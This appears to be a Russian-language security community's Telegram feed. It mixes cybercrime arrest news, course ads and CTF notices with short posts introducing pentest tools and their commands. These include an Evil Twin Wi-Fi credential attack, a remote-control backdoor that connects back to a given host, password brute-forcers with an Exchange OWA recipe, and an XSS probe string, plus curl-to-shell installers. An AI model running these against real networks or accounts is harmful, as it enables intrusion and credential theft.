34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
Один клик — и роутер под контролем атакующего
💀 Открыл письмо, кликнул по ссылке — браузер молча отправил POST-запрос на 192.168.1.1. Без пароля. Без уведомления. Добро пожаловать в CVE-2025-15101.
🔍 Связка CSRF + OS Command Injection в роутерах ASUS (прошивка 3.0.0.6_102 и ниже) даёт атакующему root shell через браузер жертвы. Почему это критично:
• httpd на ASUS работает от root — команды уходят сразу с максимальными привилегиями
• сессия админа в AsusWRT не истекает часами — окно атаки всегда открыто
• нет WAF, CSP, SIEM — атака проходит в тишине
⚠️ Аналогичный паттерн в AsusWRT фиксировали ещё в 2018-м. Номера CVE меняются — архитектура нет.
Полный разбор kill chain, лабораторный стенд и чеклист митигации:
https://codeby.net/threads/cve-2025-15101-csrf-os-command-injection-v-routerakh-asus-polnaya-karta-uyazvimosti-ot-klika-do-root-shell.92554/
🚨 Российский хакер арестован!
🔗 Российский хакер приговорен к 2 годам лишения свободы за атаки с использованием ботнета TA551, распространявшего программу-вымогатель.
🎇 Министерство юстиции США сообщило*, что гражданин России приговорен к двум годам лишения свободы за управление ботнетом, который использовался для осуществления атак с применением программ-вымогателей против американских компаний.
🪧 40-летний Илья Ангелов из Тольятти (нет, не Италия) также был оштрафован на 100 000 долларов. Ангелов, использовавший в сети псевдонимы «milan» и «okart», предположительно, в период с 2017 по 2021 год был соруководителем российской киберпреступной группы, известной как TA551 (также известной как ATK236, G0127, Gold Cabin, Hive0106, Mario Kart, Monster Libra, Shathak и UNC2420 ).
💵 Главной целью атак была перепродажа доступа другим преступным группам, которые использовали его для вымогательства с помощью программ-вымогателей. В период с августа 2018 года по декабрь 2019 года TA551 предоставила группе BitPaymer, занимавшейся распространением программ-вымогателей, доступ к своему ботнету, что позволило этой группировке атаковать 72 американских корпораций. В результате было выплачено более 14,17 миллионов долларов в виде вымогательских платежей.
✉️ В феврале 2021 года, фишинговые электронные письма, содержащие защищенные паролем архивы, обманом заставляли получателей открывать документы Microsoft Word с поддержкой макросов, что приводило к развертыванию программы для загрузки макросов под названием MOUSEISLAND. Вредоносное ПО служило каналом для вторичной полезной нагрузки, получившей кодовое название PHOTOLOADER, которая, в конечном итоге, установила IcedID. И MOUSEISLAND, и PHOTOLOADER приписываются TA551.
Источник: https://www.justice.gov/usao-edmi/pr/russian-cybercriminal-sentenced-prison-using-botnet-steal-millions-american-businesses
#russia #usa #hacker #ta551
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
🎯 enject — защита .env секретов от утечек через AI и код
enject — это open source-инструмент, который скрывает чувствительные данные из .env файлов, предотвращая их утечку при работе с AI, логированием и сторонними сервисами. Ранее проект назывался enveil.
git clone https://github.com/greatscott/enject
cd enject
cargo build --release
cd your-project
enject init
👮 Россия арестовала киберпреступника!
⏺️ В России арестован администратор LeakBase за масштабную операцию кражи учетных данных.
🪧 По данным ТАСС и новостного сайта МВД, подозреваемый является жителем города Таганрога. Сообщается, что он был задержан за создание и управление криминальным сайтом, позволявшим торговать украденными личными базами данных с 2021 года.
🕸 «На платформе хранились сотни миллионов учетных записей пользователей, банковские реквизиты, имена пользователей и пароли, а также корпоративные документы, полученные путем взлома», — заявил официальный представитель МВД России. «Более 147 000 пользователей, зарегистрированных на форуме, могли покупать и продавать эти данные, а также использовать их для совершения мошеннических действий против граждан».
🌐 Министерство юстиции США заявило, что этот форум для киберпреступников был одним из крупнейших в мире центров, где киберпреступники покупали и продавали украденные данные и инструменты для киберпреступлений.
💵 Данный форум включал сотни миллионов учетных данных и финансовой информации, такой как номера кредитных и дебетовых карт, банковские счета, имена пользователей и связанные с ними пароли, которые могли быть использованы для осуществления атак с целью захвата учетных записей.
❗️ Теперь посетителей сайта встречает сообщение: «В ходе специальной операции Бюро специальных технических мероприятий Министерства внутренних дел России форум LeakBase был закрыт навсегда. Незаконные действия в сфере компьютерной информации, а также нарушения конституционных прав и свобод личности и граждан влекут за собой уголовную ответственность в соответствии с российским законодательством».
❓ Как вы считаете, доведут дело до конца?
#leakbase #russia #police
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
🔑 Gixy-Next — инструмент для анализа безопасности конфигураций Nginx
Gixy — это open source-анализатор конфигураций Nginx, который помогает находить потенциальные уязвимости, ошибки и небезопасные настройки. Инструмент особенно полезен как для DevOps задач так и для проведения пентеста web-инфраструктуры. Он автоматически проверяет конфигурационные файлы и выявляет проблемы, которые могут привести к утечкам данных, обходу ограничений или выполнению вредоносных запросов.
pip3 install gixy-next
gixy /etc/nginx/nginx.conf
gixy /etc/nginx/
🔁 Пятничный опрос
Сегодня проверим, насколько ты ориентируешься в nmap
Подсказка:
nmap - это утилита для сканирования сети, которая используется для обнаружения хостов, открытых портов, сервисов и их версий, а также анализа безопасности сети.Читать полностью…
Полностью настраиваемая платформа для составления отчетов о тестировании на проникновение, предназначенная для специалистов в области кибербезопасности.
sudo apt update
sudo apt install -y sed curl openssl uuid-runtime coreutils
curl -fsSL https://get.docker.com | sudo bash
bash <(curl -s https://docs.sysreptor.com/install.sh)
http://127.0.0.1:8000/
User Scanner: Инструмент OSINT для проверки наличия учетных записей
User Scanner — это инструмент OSINT с открытым исходным кодом, предназначенный для проверки наличия учетных записей по электронной почте или имени пользователя на множестве платформ. Инструмент объединяет в себе возможности сканирования email-адресов и имен пользователей, обеспечивая быструю и точную оценку присутствия целевых учетных данных в социальных сетях, разработческих платформах, форумах и других интернет-сервисах.
pipx install user-scanner
user-scanner -h
user-scanner -e name@gmail.com
user-scanner -u name
user-scanner -v -e name@gmail.com
#cканирование списка email-адресов
user-scanner -ef emails.txt
#cканирование списка имен пользователей
user-scanner -uf usernames.txt
user-scanner -u name --only-found
Стеганография в изображениях
Основные инструменты:
💻 zsteg - комбайн по работе с PNG и BMP
gem install zsteg
zsteg -a pic.png
pip install --user git+https://github.com/Hedroed/png-parser
png-parser pic.png
sudo apt install steghide
steghide extract -sf pic.jpg
sudo apt install ./stegseek_0.6-1.deb
stegseek pic.jpg rockyou.txt
pip3 install stegoveritas
stegoveritas pic.png
java -jar StegSolve.jar
exiftool pic.png
sudo apt install pngcheck
pngcheck -v pic.png
pip3 install stegpy
stegpy pic.png
😄😀😂🙂🙃
С вечера пятницы у нас наблюдаются технические проблемы с Telegram: часть входящих сообщений может не доходить до менеджеров или отображаться с задержкой.
Мы переживаем, что могли пропустить ваши вопросы 🙏
Если вы писали нам в Telegram с пятницы вечера и не получили ответа — пожалуйста, продублируйте сообщение на почту:
📩 school@codeby.email
Если вы уже общались с конкретным менеджером, можно написать напрямую ему на рабочую почту.
Мы обязательно ответим как можно быстрее.
Также на время решения проблемы рекомендуем использовать email для всех срочных вопросов.
Спасибо за понимание 🚗
🌐eaphammer — инструмент для проведения таргетированных атак типа Evil Twin на сети WPA2-Enterprise.
Предназначен для использования в рамках полноценных аудитов беспроводной безопасности и Red Team-операций, поэтому основной акцент сделан на простом и удобном интерфейсе, который позволяет выполнять мощные атаки на беспроводные сети с минимальной ручной настройкой.
Атака Evil Twin заключается в том, что злоумышленник создает фальшивую точку доступа Wi-Fi, которая имеет такое же название (SSID), как и легитимная точка, но с лучшим уровнем сигнала. Пользователи, подключаясь к этой сети, не осознают, что подключаются не к защищенной сети, а к точке доступа злоумышленника. Это позволяет злоумышленникам перехватывать данные, передаваемые между устройством и точкой доступа, включая пароли, логины и другие конфиденциальные данные.
sudo apt install eaphammer, так и из исходного кода:git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup
# Генерация сертификата
./eaphammer --cert-wizard
# Запуск атаки
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
🚩 Новые задания на платформе HackerLab!
🔎 Категория OSINT — Неизвестный автомобиль
Приятного хакинга!
🐰Новая лаборатория на HackerLab — Rabbit Hole
Архитекторы RabbitHole уверены, что их инфраструктура недосягаема: минимум внешних сигналов, жёсткая сегментация и доверие к собственным компонентам.
Rabbit Hole — инфраструктурная black-box лаборатория, где вам предстоит шаг за шагом собирать картину происходящего, искать слабые связи между компонентами и выстраивать цепочку компрометации.
Что внутри:
🟢Web Perimeter, Microservices, Supply Chain, K8s Security
🟢многоступенчатый сценарий
🟢разведка, логика и chaining уязвимостей
🟢современная cloud-native инфраструктура
Ваш доступ — минимален.
Ваш заказчик — неизвестен.
Сделайте всё, на что способны.
↗️https://hackerlab.pro
Автор лабы: Black Rabbit, автор курса по Active Directory в Codeby
🧠 AttackGen — генератор сценариев атак на основе MITRE ATT&CK и LLM
AttackGen — open source-инструмент, который использует LLM-модели для генерации реалистичных сценариев кибератак на основе фреймворка MITRE и базы знаний MITRE ATT&CK.
Инструмент предназначен для специалистов по безопасности, SOC-аналитиков и Red Team-команд, помогая быстро создавать реалистичные цепочки атак, которые можно использовать для обучения или тестирования защиты.
git clone https://github.com/mrwadams/attackgen.git
cd attackgen
pip install -r requirements.txt
streamlit run 00_👋_Welcome.py
Industry: Financial services
Infrastructure: Cloud + Active Directory
Security maturity: Medium
Initial Access: Spear phishing campaign targeting employees
Execution: Malicious macro payload
Persistence: Scheduled task
Privilege Escalation: Token manipulation
Lateral Movement: SMB and remote service execution
Exfiltration: Data transfer over HTTPS
9 апреля 2026 года в Москве — Deckhouse Conf.
Один день, два трека, стенды Deckhouse и партнёров, 1000 участников.
В программе: кейсы внедрения Deckhouse в крупных инфраструктурах, технологии виртуализации и SDN в Kubernetes, практики разработки платформенных продуктов.
Для DevOps-инженеров, SRE, платформенных разработчиков и архитекторов.
Регистрация открыта
Инструмент с открытым исходным кодом, предназначенный для аудита безопасности Active Directory, который подключается к контроллеру домена и выполняет 35 автоматических проверок безопасности. Дает быструю оценку неправильных конфигураций Active Directory, а также ищет уязвимые места в инфраструктуре.
# Клонируем репозиторий
git clone https://github.com/yourorg/adpulse.git
cd adpulse
# (Recommended) Создаем виртуальное окружение
python -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
# Устанавливаем зависимости
pip install -r requirements.txt
python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!'
python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!' --dc-ip 10.0.0.1 --report html --output-dir /tmp/scans
Tyrant
Tyrant — это вредоносный инструмент, используемый для тестирования на проникновение и обеспечения постоянного присутствия под удаленным управлением, обладающий обширными возможностями.
git clone https://github.com/MartinxMax/Tyrant.git
cd Tyrant/
sudo apt-get install zlib1g-dev libzstd-dev libssl-dev
gcc -static -o tyrant tyrant.c ./lib/core.c ./lib/random_md5.c -lssl -lcrypto -lz -lzstd
./tyrant -uid [UID] -rhost [RHOST] -rport [RPORT]
ParamSpider: Инструмент для извлечения URL из веб-архивов
ParamSpider — утилита с открытым исходным кодом, предназначенная для извлечения URL-адресов, связанных с целевым доменом, из веб-архивов (Wayback Machine). Инструмент автоматически фильтрует «неинтересные» URL, позволяя исследователям безопасности сосредоточиться на потенциально значимых конечных точках для дальнейшего анализа, фаззинга и тестирования.
sudo apt install paramspider
paramspider -h
paramspider -d example.com
paramspider -l domains.txt
paramspider -d example.com -s
paramspider -d example.com --proxy '127.0.0.1:7890'
paramspider -d example.com -p '"><h1>reflection</h1>'
🙃🥰🤣🤪😄
Пользуясь случаем, хотим поделиться с вами мощным отзывом на наш курс по веб-пентесту!
Один из наших выпускников подробно разобрал, как проходит обучение, что реально даёт результат и почему курс часто рекомендуют даже опытные специалисты, за что мы очень благодарны!
👉 обучение строится вокруг практики — от SQLi и XSS до SSRF, SSTI, CMDi, LFI и построения цепочек до RCE
👉 каждую неделю проходят вебинары с куратором, где можно разобрать сложные моменты и задать любые вопросы
👉 обратная связь не формальная — наставники помогают 24/7
👉 финальный модуль — полноценная практика ручного поиска уязвимостей
🚩 Новые задания на платформе HackerLab!
🌍 Категория Веб — Музей
——————————————
🗂 В архив добавлены задания + райтапы:
🔵Веб - RevengeNinja
Приятного хакинга!
🖥️ Legba v1.2.0
Быстрый брутфорсер с поддержкой большого количества протоколов, написан на Rust
Установка:
cargo install legba
legba http.basic \
--username admin \
--password wordlists/passwords.txt \
--target http://localhost:8888/
legba \
-R cookbook/http/ms-exchange/owa.yml \
-U users.txt \
-P passwords.txt \
"host=ms-server.local"
description: Microsoft Exchange bruteforce via OWA endpoint.
author: evilsocket
plugin: http
args:
target: "{$schema or https}://{$host}:{$port or 443}/owa/auth.owa"
http-method: POST
http-success-codes: 302
http-success-string: set-cookie
http-payload: destination={$schema or https}://{$host}:{$port or 443}/&flags=4&username={USERNAME}&password={PASSWORD}
Юго-восточный OSINT: что делать, если компания за границей?
Работа с зарубежными контрагентами требует совсем другого подхода к проверке данных, чем в национальных юрисдикциях.
Как выстроить этот процесс системно — тема новой статьи и ключевой навык, который вы освоите на курсе «OSINT: Технология боевой разведки». Ближайший старт — 20 апреля.
В статье рассказываем:
⏺️Почему нельзя полагаться на один источник
⏺️Как искать ключевые идентификаторы компаний
⏺️Где проверять компании в Индии, Турции, ОАЭ и Китае
⏺️Какие источники дают целостную картину бизнеса
Делимся практическими инструментами и подходами, которые помогут вам уверенно работать с иностранными контрагентами.
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
🧿 Sirius — мощный сканер уязвимостей и управления поверхностью атаки
Sirius — это современный open source-инструмент для автоматизированного сканирования уязвимостей, анализа инфраструктуры и управления атакуемой поверхностью (ASM). Он сочетает в себе функции сканера, менеджера активов и платформы для непрерывного мониторинга безопасности.
git clone https://github.com/SiriusScan/Sirius.git
cd Sirius
docker compose -f docker-compose.installer.yaml run --rm sirius-installer
docker compose up -d
🍯 ADTrapper — инструмент для обнаружения атак в Active Directory с помощью honeypot-аккаунтов
ADTrapper — open source-инструмент для обнаружения атак внутри инфраструктуры Microsoft Active Directory. Он создаёт honeypot-объекты и ловушки в AD, которые позволяют выявлять злоумышленников во время разведки, lateral movement и попыток повышения привилегий.
Идея инструмента проста: создать в каталоге приманки, которые выглядят как реальные учётные записи или ресурсы. Любая попытка взаимодействия с такими объектами практически всегда означает подозрительную активность.
git clone https://github.com/MHaggis/ADTrapper.git
cd ADTrapper
cp env.example .env
./deploy.sh
docker-compose up -d
docker-compose exec -T database psql -U postgres < supabase/migrations/0001_simple_setup.sql
BruteForceAI - метод перебора с помощью нейросети🧠
BruteForceAI — это инструмент для тестирования на проникновение, который преобразует традиционные атаки методом перебора, интегрируя LLM для интеллектуального анализа форм. Инструмент автоматически идентифицирует селекторы форм входа в систему с помощью ИИ, а затем выполняет сложные многопоточные атаки с использованием моделей поведения, сходных с человеческими.
git clone https://github.com/MorDavid/BruteForceAI
cd BruteForceAI/
pip install -r requirements.txt
curl -fsSL https://ollama.ai/install.sh | sh
ollama pull llama3.2:3b
vim urls.txt
python BruteForceAI.py analyze --urls urls.txt --llm-provider ollama
python BruteForceAI.py attack --urls urls.txt --username users.txt --passwords passwords.txt --threads 10
Titus — быстрый сканер секретов в коде и Git
Titus — инструмент для поиска утёкших секретов: API-ключей, токенов, паролей и других учетных данных в исходном коде, файлах и Git-истории.
Сканер использует 487 правил детекции и поддерживает проверку найденных ключей через API сервисов, чтобы определить активны ли они
git clone https://github.com/praetorian-inc/titus
cd titus
make build
titus scan file.txt
titus scan ./project
titus scan --git path/to/repo
titus scan ./code --validate
🔁 Пятничный опрос
Сегодня проверим, насколько хорошо ты понимаешь Boolean-based Blind SQLi.
❓ Вопрос простой:
что из предложенного — именно этот тип инъекции?
Подсказка:
Boolean-based Blind SQLi — это тип SQL-инъекции, при котором атакующий определяет истинность условий (TRUE/FALSE) по косвенным признакам ответа приложения (например, изменению страницы), без явного вывода данных или ошибок.Читать полностью…
Почему 80% атак на компании остаются незамеченными в первые часы?
Потому что наличие средств защиты ≠ наличие специалистов, которые умеют видеть и интерпретировать происходящее в инфраструктуре.
🔎 DetectFlow — инструмент для автоматизации разработки detection-правил
DetectFlow — open source-инструмент от SOC Prime, предназначенный для автоматизации процессов Detection Engineering. Он помогает создавать, тестировать и поддерживать правила обнаружения угроз для SIEM, EDR и других систем мониторинга безопасности.
git clone https://github.com/socprime/detectflow-one-click-local-deployment.git
cd detectflow-one-click-local-deployment
chmod +x deploy-detectflow-minikube.sh
./deploy-detectflow-minikube.sh
💻 Meg by tomnomnom — инструмент для массовых HTTP-запросов
meg — лёгкая CLI-утилита для массовой отправки HTTP-запросов к большому количеству целей. Инструмент разработан исследователем безопасности Tom Hudson (известным как tomnomnom) и широко используется в bug bounty, OSINT и web-разведке. Утилита позволяет быстро отправлять один и тот же HTTP-запрос на сотни или тысячи доменов, что особенно полезно при поиске уязвимостей, скрытых эндпоинтов и конфигурационных ошибок.
go install github.com/tomnomnom/meg@latest
example.com
api.example.com
test.example.com
GET /admin HTTP/1.1
Host: example.com
User-Agent: meg
Connection: close
meg request.txt targets.txt
cat domains.txt | meg request.txt